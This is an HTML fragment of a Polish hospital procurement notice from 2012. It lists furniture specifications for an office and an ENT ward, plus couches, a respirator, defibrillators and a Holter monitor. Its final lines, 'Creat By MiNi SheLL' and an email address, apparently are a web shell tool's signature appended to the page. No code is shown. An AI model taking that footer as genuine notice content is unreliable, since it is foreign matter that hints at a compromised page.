<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MEBLE DO KANCELARII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	wyposażenie aneksu	
1.	szafką z drzwiczkami pod zlewozmywak jednokomorowy z ociekaczem; szer. 800 mm, gł. 600 mm wysokość 850 mm (zlewozmywak o wymiarach 600 mm x 800 mm dostarcza zamawiający); po lewej stronie lodówka wolnostojąca o wys. 840 mm przykryta blatem, blat wykonany z postformingu gr. 30 mm powyżej dwie szafki o szerokości odpowiadającej dolnej zabudowie, z lewej strony: szer. 550 mm, gł. 350 mm wysokość 720 m, z prawej strony szer. 800 mm, gł. 350 mm wysokość 720 mm	1 kpl
II.	pomieszczenie biurowe	
1. 	lada oddzielająca z blatem o wysokości 1100 mm: blat górny gł. ok 400 mm grubość 36 mm, biurko od strony obsługi gł. 450 mm, dł. 1600 mm, wys. 750 mm; pod blatem biurka regał otwarty na dokumenty z dwiema półkami, pierwsza na wysokości 300 mm, a druga na wysokości 550 mm; w ladzie przejście o szerokości minimum 600 mm, zamknięte drzwiczkami z zasuwką;	1 kpl
2.	szafa na korespondencję: 26 przestrzeni o wysokości ok. 100 mm szerokości 500 mm i głębokości 360mm, powyżej szafa z drzwiami na dokumenty wys. 900 mm, szer. 500 mm z dwoma półkami rozmieszczonymi co 350 mm licząc od dołu z możliwością regulacji co 25 mm	1 kpl
3.	szafa ubraniowa dla dwóch osób: gł. 380 mm, szer. 600 mm, wys. Ok. 1800 mm; powyżej części
ubraniowej część na dokumenty; wys. 500 mm, szer. 600 mm z jedną półką znajdującą się po środku szafki z możliwością regulacji co 25 mm	1 szt.
4.	szafa na dokumenty: wewnątrz półki z odstępami na segregatory A4 pionowo; zamykane
drzwiami; szer. ok 700 mm, gł. 380 mm, wys. ok 2300 mm;; szafy umieszczone za ladą - w części dla pracowników - bez zamków; szafy umieszczone w ciągu komunikacyjnym - w części przeznaczonej dla petentów - z zamkami;	9 szt.
5.	biurko : szer. 1800 mm; gł. 750 mm; wys. 800 mm; blaty grubość 36 mm; prowadnica na klawiaturę; w blatach przepusty kablowe	2 szt.
6.	kontenerek z trzema szufladami, z zamkiem centralnym;  szer. 450 mm; gł. 500 mm; wys. 600 mm; na kółkach	2 szt.
7.	fotel obrotowy ; tapicerka materiałowa, wysokość regulowana, podłokietniki regulowane; wysokie oparcie regulowane	2 szt.
8.	szafka - pomocnik biurka: szafka z drzwiami otwieranymi na zawiasach; wys. 800 mm,
szer. 800 mm, gł. 400 mm; blat grubość 36 mm	2 szt.
9.	krzesło w poczekalni - stelaż metalowy, tapicerka zmywalna na siedzisku i oparciu	1 szt.
10.	stolik: mocowany do ściany, blat gr. 36mm, kształt łukowy; podparty nogą metalową fi 80 mm 
w kolorze satyna; szer. 500 mm; gł. 600 mm; wys. 750 mm	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.53-1, 39.11.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MEBLE NA ODDZIAŁ  OTOLARYNGOLOGICZNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Dyżurka (wg rysunku nr 29 - 35)
Informacje ogólne:
-	korpusy i fronty z płyty melaminowanej, zabezpieczonej obrzeżem PCV
-	zawiasy metalowe puszkowe fi 35 mm
- uchwyty ZnAl
- szuflady metalowe, (minimum na prowadnicach rolkowych)
- blaty postforming gr. 28 mm	
1.	szafy na rzeczy osobiste dla 16 osób o wymiarach szer. 670 mm. wys. 1400 mm, gł. 500 mm
po dwie przestrzenie dla jednej osoby;
zamki meblowe w drzwiach;
wewnątrz haczyk podwójny i półka;
uchwyty metalowe ZnAl;
całość wykonana z płyty melaminowanej, obrzeża zabezpieczone PCV	4 szt.
2.	aneks socjalny z umywalką szerokość całkowita 1800 mm, głębokość 550 mm; wysokość do górnej krawędzi blatu 850 mm
na zestaw składają się :	
a)	szafka stojąca z szufladami szer. 400 mm	1 szt.
b)	szafka stojąca narożna z jednymi drzwiami, wewnątrz półka; szer. ok. 950 mm	1 szt.
c)	blat postforming grubość 28 mm; uchwyty metalowe ZnAl;
	1 szt.
d)	szafki wiszące maksymalnie wysokie ok. 600 mm (do krawędzi planowanego przeszklenia);
całkowita głębokość szafek wiszących 320 mm;
korpusy szafek i fronty wykonane z płyty melaminowanej, obrzeże PCV; w tym:	
-	szafka z dwojgiem drzwi szer. ok 1200 mm (wewnątrz jedna półka)	1 szt.
-	szafka narożna z jednymi drzwiami szer. ok 800 mm (wewnątrz jedna półka)
	1 szt.
3. 	stolik podłużny o wymiarach dł. 1000 mm szer. 500 mm wys. 600 mm z półką na czasopisma; cały wykonany z płyty melaminowanej zabezpieczonej obrzeżem PCV	1 szt.
4.	fotele z tapicerką zmywalną: skaj/ekoskóra ze zdejmowalnymi dodatkowymi nakładkami materiałowymi; wygodne typu klubowego; z podłokietnikami miękkimi	2 szt.
5.	krzesła tapicerka zmywalna; skaj/ekoskóra, podłokietniki, stelaż metalowy, tapicerka na siedzisku i oparciu	2 szt.
II.	Przygotowanie leków oddział Otolaryngologiczny
Informacje ogólne:
-	korpusy i fronty z płyty melaminowanej, zabezpieczonej obrzeżem PCV
-	zawiasy metalowe puszkowe fi 35 mm
-	uchwyty ZnAl
-	szuflady metalowe, (minimum na prowadnicach rolkowych)
-	blaty postforming gr. 28 mm	
1.	oznaczenie: MEDYCZNY
witryna na leki : przeszklona, szkło zwykłe 6 mm, konstrukcja z płyty melaminowanej; zamek meblowy w drzwiach; uchwyty ZnAl; wewnątrz półki z płyty melaminowanej wys. 1800 mm, szer. 800 mm, gł.400 mm	1 szt.
2.	zabudowa umywalki - dostosowana do umywalki o szerokości 550 mm (umywalkę dostarcza zamawiający)  propozycja: umywalka nakładana wysokość górnej krawędzi umywalki ok. 820- 870 mm od posadzki	1 szt.
3.	zabudowa meblowa wysokość górnej krawędzi blatu 850 mm od posadzki; głębokość blatu
600 mm;
- zabudowa zlewozmywaka: zlewozmywak metalowy, jednokomorowy o wymiarach 500 x 500 mm, nakładany na blat, zakup zlewozmywaka po stronie zamawiającego, wewnątrz szafki przestrzeń wolna; szerokość zabudowy ok 800mm, głębokość blatu 600 mm
- szafka z sześcioma szufladami o wysokości 150 mm każda, szer. 500 mm ; boki szuflady metalowe (minimum na prowadnicach rolkowych) fronty drewniane
- szafka podblatowa z jednymi drzwiami: wewnątrz półki szt. 2; drzwi prawe;
- przestrzeń wolna pod blatem - na wózki szpitalne na leki szt. 2, (rozmiary wózka do przewożenia leków to dł. 660 mm, szer. 425 mm, wys. 875 mm)
- stanowisko opisywania recept: biurko blat z postrformingu dł. 800mm gł 500mm
- taboret wstawiany pod blat; stelaż metalowy, siedzisko tapicerowane, zmywalne skaj/ekoskóra
- szafka wisząca wys. 900 mm , szer. 1000mm. gł. 320mm, dwoje drzwi lewych, wewnątrz trzy półki
- szafka wisząca wys. 900 mm, szer. ok. 750 mm, gł. 320 mm, dwoje drzwi prawych, wewnątrz trzy
półki
- szafka wisząca narożna z jednymi prawymi drzwiami wys. ok. 600 mm, szer. 600 mm gł.320mm,
wewnątrz dwie półki
- szafka wisząca wys. ok 600 mm, szer. 800 mm, gł. 320 mm dwoje drzwi, wewnątrz dwie półki
- szafka wisząca wys. ok 600 mm szer. ok 400 mm gł. 320 mm jedne drzwi prawe, wewnątrz jedna
półka
	1 kpl
4.	krzesła na salę chorych; 
z tapicerką zmywalną (ekoskóra/skaj) stelaż metalowy, tapicerka na siedzisku i
oparciu;	20 szt.
III.	Sekretariat   (wg rysunku nr 36 - 39) 
Projekt: ściana z profili alu/pcv przeszklona: okienko podawcze zamykane na klamkę od wewnątrz; drzwi wejściowe zamykane na klucz
od frontu półka na (torebki) oraz blat umożliwiający odłożenie dokumentów część szyb przy okienku podawczym przezierna, pozostałe szyby w ścianie i drzwiach białe matowe - wykonanie po stronie zamawiającego; Opisana zabudowa będzie stanowiła integralną część z wykonaną zabudową meblową i musi zostać uwzględniona przez wykonawcę
	
1.	biurko przy ścianie przeszklonej: szer. ok. 1500 mm, gł. 500 mm, wys. 750mm; prowadnica na klawiaturę; w blatach przepusty kablowe	1 szt.
2.	kontenerek z szufladami : szer. 400 mm, gł. 450 mm, wys. 600 mm na kółkach, zamek w pierwszej szufladzie	2 szt.
3.	szafa na dokumenty zamykana drzwiami suwanymi: szer.800 mm gł. 450 mm, wys. ok. 2300mm	4 szt.
4.	biurko pod oknem - szer. ok. 2400 mm, gł. 600 mm; wys. 750 mm; prowadnica na klawiaturę; w blatach przepusty kablowe	1 szt.
5.	krzesło obrotowe z podłokietnikami, kółka, regulacja siedziska, oparcia i podłokietników, tapicerka zmywalna	2 szt.
6.	krzesła biurowe typu kubełek, tapicerka zmywalna	2 szt.
IV.	Gabinet Ordynatora Oddziału Otolaryngologii  (wg rysunku nr 40 - 43)
Informacje ogólne
-	korpusy i fronty z płyty melaminowanej, zabezpieczonej obrzeżem PCV
-	zawiasy metalowe puszkowe fi 35 mm
-	uchwyty ZnAl
-	szuflady metalowe, (minimum na prowadnicach rolkowych)
-	blaty postforming gr. 28 mm	
1.	biurko; wysokość biurka 750 mm, szer. 1500 mm, gł. 600 mm, prowadnica na klawiaturę; w blatach przepusty kablowe	1 szt.
2.	regał otwarty z dwoma półkami- odstępy pomiędzy półkami 350 mm  (na segregator A4 pionowo); wysokość regału  1100 mm, szerokość 1000 mm, głębokość 300 mm 	1 szt.
3.	szafka stojąca ; wymiary: wys. 750 mm, szer. 1000 mm, gł. 350 mm; Dzielona na dwie równe części, część lewa (od strony okna) z drzwiczkami zamykanymi na kluczyk oraz z jedną półką w połowie wysokości z możliwością regulacji co 25 mm; prawa strona zawierająca 3 szuflady na prowadnicach o wysokościach: dwie szuflady 250 mm i jedna 150 mm,	1 szt.
4.	szafka zamykana z półkami składająca się z dwóch części; dolna część o wysokości 750 mm, szer. 600 mm, gł. 350 mm. półka znajdująca się w połowie wysokości, z możliwością regulacji co 25 mm;  górna część o wymiarach: wys. 1550 mm, szer. 600 gł. 350 mm, z półkami co 350 mm z możliwością regulacji co 25 mm, ilość półek 3	2 szt.
5.	fotel obrotowy - oparcie wysokie; podłokietniki regulowane; tapicerka zmywalna, kółka PCV dostosowane do wykładziny typu tarkett	1 szt.
6.	zabudowa umywalki: szafka stojące z blatem wys. 650 mm, szer. 600 mm gł. 250 mm. obudowujące umywalkę - umywalka wpuszczana w blat, prostokątna o szerokości 550 mm (umywalkę zapewnia zamawiający); powyżej szafka wiszące wys. 1100 mm, szer. 600, gł. 250 mm; z drzwiami, wewnątrz 3 półki rozmieszczone co 250 mm z możliwością regulacji co 25 mm ); materiały odporne na działanie wilgoci, blat postforming)	1 kpl
7.	szafa na dokumenty: wewnątrz półki z odstępami na segregatory A4 pionowo; zamykane
drzwiami; szer. ok. 700 mm, gł. 380 mm, wys. ok. 2300 mm; 	2 szt.
8.	stolik: blat gr. 36 mm, kształt łukowy; podparty nogą metalową fi 80 mm 
w kolorze satyna; szer. 500 mm; gł. 600 mm; wys. 750 mm	1 szt.
9.	krzesła biurowe typu kubełek, tapicerka zmywalna	2 szt.
V.	Pokój lekarski Otolaryngologia   (wg rysunku nr 44 - 47)
Informacje ogólne:
-wszystkie meble wykonane z płyty melaminowanej 18 mm, 
-krawędzie zabezpieczone obrzeżem PCV 1mm - na blatach i frontach 2mm; 
-w blatach biurek wykonane przepusty kablowe zabezpieczone przelotkami plastikowymi; 
-uchwyty metalowe ZnAl; 
-zawiasy puszkowe fi 35 metalowe z dożywotnią gwarancją; 
-zamki meblowe każdy z odrębnym kluczem (dwa klucze w komplecie)	
1.	biurko z miejscem na komputer  z wysuwaną półką na klawiaturę pod blatem; w blatach przepusty kablowe, wysokość biurka 750 mm, szer. ok 1150 mm  gł. 600 mm  szt. 3; wys. 750 mm  szer. 1100mm gł. 600 mm  	2 szt. 
2.	nadstawki na biurko regaliki otwarte z półkami - odstępy pomiędzy półkami na segregator A4 pionowo;  pierwsza półka ponad blatem na wys. 550 mm; wysokość regału ok. 1100 mm, szerokość - wynikowo z zabudowy biurek; głębokość 250 mm	2 szt.
3.	regał otwarty: półki regulowane na wysokości, odstępy pomiędzy półkami a segregator A4    pionowo; głębokość 350 mm, wysokość  ok. 1850 mm, szerokość ok. 700 mm	1 szt.
4.	szafka na rzeczy osobiste:  szafa z przegrodami o wymiarach  ok. 400/400 mm, zamykanymi na zamek meblowy; do każdego zamka inny klucz; wysokość 1700 mm, szerokość 800 mm, głębokość 400 mm; szafa z pięcioma przegrodami zamykanymi drzwiami o wymiarach ok 400/400 m, każda z zamkiem meblowym; pozostałe przestrzenie otwarte półki z regulacją 
	2 szt.
5.	nadstawki na szafy socjalne: otwarte półki na dokumenty - przestrzenie pomiędzy półkami na segregatory A4 pionowo; wysokość 1000 mm, głębokość 400 mm, szerokość 800 mm	2 szt.
6.	fotel obrotowy - oparcie wysokie; podłokietniki regulowane; tapicerka zmywalna, kółka PCV dostosowane do wykładziny typu tarkett	1 szt.
7.	zabudowa umywalki: szafka stojąca zamykana z jedną półką w połowie wysokości z możliwością regulacji co 25 mm; wymiary: wys. 700 mm, szer. 350 mm gł. 500 mm - szt 2; szafka stojąca zamykana z jedną półką w połowie wysokości z możliwością regulacji co 25 mm; wymiary: wys. 700 mm, szer. 500 mm gł. 500 mm; szt 1;  na szafkach blat o wymiarach: dł. 1200, szer. 520 mm i gr. 25 mm -  szt. 1 	1 kpl
8.	zabudowa nad umywalką: szafka wisząca zamykana z dwoma półkami co 220 mm  z możliwością regulacji co 25 mm; wymiary: wys. 720 mm, szer. 350 mm gł. 350 mm -  szt 2; szafka wisząca zamykana z dwoma półkami co 220 mm z możliwością regulacji co 25 mm; wymiary: wys. 720 mm, szer. 500 mm gł. 350 mm -  szt 1 	1 kpl
9.	kanapa rozkładana tapicerka zmywalna dł. 200 cm, szer. po rozłożeniu160 cm	1 szt.
VI.	Pomieszczenia dodatkowe	
1.	magazyn bielizny czystej;
regały z drzwiami, wewnątrz 7 półek; szer. 900 mm; gł. 400 mm; wys. 2500 mm
	2 szt.
a)	magazyn : regały, szer. 700 mm, gł. 400 mm wys. 2500 mm, 7 półek o regulowanej
wysokości co 25 mm; 	2 szt.
b)	magazyn : regał szer. 900 mm gł. 600 mm wysokość 2500 mm, 7 półek o regulowanej wysokości co 25 mm;	1 szt.
2.	Poczekalnia	
a)	regał na czasopisma: szer. 600 mm, gł. 350 mm, wys. 1200 mm otwarty, 3 półki regulowane co 25 mm	1 szt.
b)	ławki z pojedynczymi krzesłami i stolikami pomiędzy nimi (zestaw:  1 siedzisko i 2 stoliki), tapicerka na krzesłach zmywalna	4 szt.
c)	wieszak ścienny: wieszaki metalowe na płycie melaminowanej wys. 1200 mm, szer. 120 mm  wraz z lustrem	5 szt.
VII.	Gabinet lekarski/ gabinet zabiegowy:	
1.	oznaczenie: MEDYCZNY
biurko szer. 1300 mm, gł. 600 mm, wys. 750 mm,  z wysuwaną półką na klawiaturę pod blatem; w blatach przepusty kablowe	1 szt.
2.	kontenerek z szufladami szer. 400 mm, gł. 500 mm, wys. 600 mm; trzy szuflady, zamek centralny, kółka; meble spełniające wymogi mebli medycznych	1 szt.
3.	fotel na kółkach, obrotowy, tapicerka na siedzisku i oparciu zmywalna; podłokietniki regulowane, wysokość siedziska regulowana	1 szt.
4.	oznaczenie: MEDYCZNY
krzesło metalowe z tapicerowanym siedziskiem i oparciem, tapicerka zmywalna	1 szt.
5.	szafa na dokumenty: wewnątrz półki z odstępami na segregatory A4 pionowo; zamykane drzwiami; szer. ok 700 mm, gł. 380 mm, wys. ok 2300 mm	2 szt.
6.	półka wisząca, szer. 700 mm, gł. 250 mm, wys. 750 mm; przestrzenie pomiędzy półkami na segregatory A4 pionowo	1 szt.
VIII.	Blok operacyjny Oddziału Otolaryngologicznego  (wg rysunku nr 48 - 50)	
1.	biurko narożne szer. 900 mm / 900 mm, wys. 850 mm; z wysuwaną półką na klawiaturę pod blatem; w blatach przepusty kablowe  	1 szt.
2.	fotel obrotowy z podłokietnikami regulowanymi, wysokie oparcie, kółka; tapicerka
zmywalna	2 szt.
	krzesło bez podłokietników, tapicerka zmywalna	4 szt.
3.	szafa na rzeczy osobiste: dolna część podzielona na 10 szafek osobistych z zamkami (do
wysokości maksymalnie 1700 mm); powyżej szafa zamykana na dokumenty z półkami -
odstępy na segregatory A4 pionowo; wymiary szer. 800 mm, wys. całości ok  2800 mm, gł. 300 mm;	1 szt.
4.	szafa na segregatory: szer. 800 mm, gł. 390 mm, wys. ok 2300 mm; wewnątrz półki na
segregatory A4 pionowo; zamki meblowe w drzwiach; uchwyty metalowe ZnAl	1 szt.
5.	Śluza brudna:
1. szafa na ubrania i buty: szer. 800 mm, gł. 600 mm, wys. 2780 mm; górna część 680 mm
zamykana drzwiami, wewnątrz jedna półka ; środkowa część zamykana drzwiami
wysokość1450mm , wewnątrz wieszak poprzeczny na ubrania; dolna część wysokość ok.
600 mm na buty - odstępy między półkami ok 150 mm, dolna część bez drzwi; we
wszystkich drzwiach zamki meblowe i uchwyty metalowe;	1 szt.
6.	Śluza czysta:
1. szafa na ubrania i buty: szer. 800 mm, gł. 600 mm, wys. 2500 mm; górna część 680 mm
zamykana drzwiami, wewnątrz jedna półka ; środkowa część zamykana drzwiami
wysokość1450 mm , wewnątrz półki; dolna część wysokość ok 600 mm na buty - odstępy
między półkami ok 150 mm, dolna część bez drzwi;  we wszystkich drzwiach zamki
meblowe i uchwyty metalowe	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.53-1, 39.11.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KOZETKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kozetka 
-	metalowy szkielet lakierowany proszkowo
-	dwusegmentowe tapicerowane leże  (kolorystyka do uzgodnienia)
-	ręczna regulacja zagłówka
-	rolka prześcieradła jednorazowego	1 szt.
2.
	Kozetka drewniana, stacjonarna 2 -segmentowa.
-wymiary standartowe: wys. 64, dł. 190 cm,  szer. 75
-szkielet wykonany z  drewna 
-tapicerka ognioodporna z kategori M2. obity wysokiej jakości materiałem skóropodobnym
-demontowane nóżki
-ruchoma część leżyska (podnośnik również drewniany) pozwalająca na ułożenie pacjenta nie tylko w pozycji leżącej, ale również w pozycji półleżącej
-kąt regulacji podgłówka  0-35° 
-dopuszczalne obciążenie do 200 kg 
-waga: 32 - 40 kg	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Respirator.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Respirator transportowy	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Defibrylator.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Aparat defibrylator	3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Holter ciśnieniowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Holter ciśnieniowy	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com